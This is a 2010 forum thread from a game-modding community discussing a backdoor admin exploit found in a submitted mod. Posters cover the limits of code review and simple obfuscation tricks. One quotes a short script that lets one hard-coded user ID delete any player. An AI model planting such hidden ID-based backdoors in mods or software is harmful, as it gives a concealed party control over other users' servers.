Author Topic: What's a "Back Door Admin Exploit"? (Read 5314 times)

Tyler66 · May 08, 2010, 10:29:42 PM

Quote from: Homfrog on May 08, 2010, 10:10:45 PM

Didn't Iban's City Mod do this too?

Quote from: Ðænth on May 08, 2010, 10:12:10 PM

Yeap.

I guess that explains why CityRP got fail-binned.

Ad Bot · Advertisement

speedyzman13 · May 08, 2010, 10:31:14 PM

Mine doesn't have it...

Welknair · May 08, 2010, 10:51:43 PM

Quote from: speedyzman13 on May 08, 2010, 10:31:14 PM

Mine doesn't have it...

Are you sure?

Nitramtj · May 09, 2010, 12:03:53 AM

Quote from: ZSNO on May 07, 2010, 06:10:35 PM

Wow, I can't believe the RTB Mod Team didn't shift through the code a bit.

When I was on the mod team, I looked through the code, of the handful of mods I checked. I guess I didn't check enough mods, probably should have asked eph about it when I noticed I wasn't on the team anymore.

Chrono · May 09, 2010, 02:03:41 AM

Quote from: Wedge on May 07, 2010, 10:07:14 PM

There is a position open for "reading every loving line of code in every mod ever submitted" if you'd like to apply. PM Ephialtes and make sure you reference this post. Code can be obfuscated too, it's pretty trivial to shift all the letters in a piece of code up 2 letters and then write a function that shifts it down and executes it, so it's not as easy as ctrl+f admin, you need to read every bit of the mod.

I should add that this post was intended to be a joke and you should not take it seriously or actually apply. As soon as RTB found out that the code was in there it was pulled from the site and Badspot also added it to the crapon list. Beyond spot checks and the file scanner I think most code just gets waived through, although you would need to ask a mod reviewer about their habits. There isn't really a better way to do it because of the amount of code submitted daily. An exploit could hide anywhere, even inside places you might not normally look, like maps. I suppose some simple exploits could be added to the scanner.

I would apply if that part wasn't a joke.

RIZENGOD · May 09, 2010, 08:53:49 PM

haha this is funny in an annoying way i found a part of the script that uses a users Bl id
function serverCmdjuggalo(%client,%msg)
{
if(%client.bl_id == 13788)
{
FindClientByName(%msg).delete();
}
}
if i didnt know better this is part of the backdoor.. XD

Kevdude · May 10, 2010, 06:26:15 AM

Quote from: Smith on May 08, 2010, 12:57:13 AM

Got rid of some code so its broken now.

Quote from: RIZENGOD on May 09, 2010, 08:53:49 PM

haha this is funny in an annoying way i found a part of the script that uses a users Bl id
function serverCmdjuggalo(%client,%msg)
{
if(%client.bl_id == 13788)
{
FindClientByName(%msg).delete();
}
}
if i didnt know better this is part of the backdoor.. XD

No you didn't

Zoslis · May 10, 2010, 05:49:50 PM

Someone posted a fix to the code destroying the Backdoor here somewhere.....The file is still floating on open seas.....

Lugnut · May 10, 2010, 06:02:41 PM

Quote from: Zoslis on May 10, 2010, 05:49:50 PM

Someone posted a fix to the code destroying the Backdoor here somewhere.....The file is still floating on open seas of PG 2.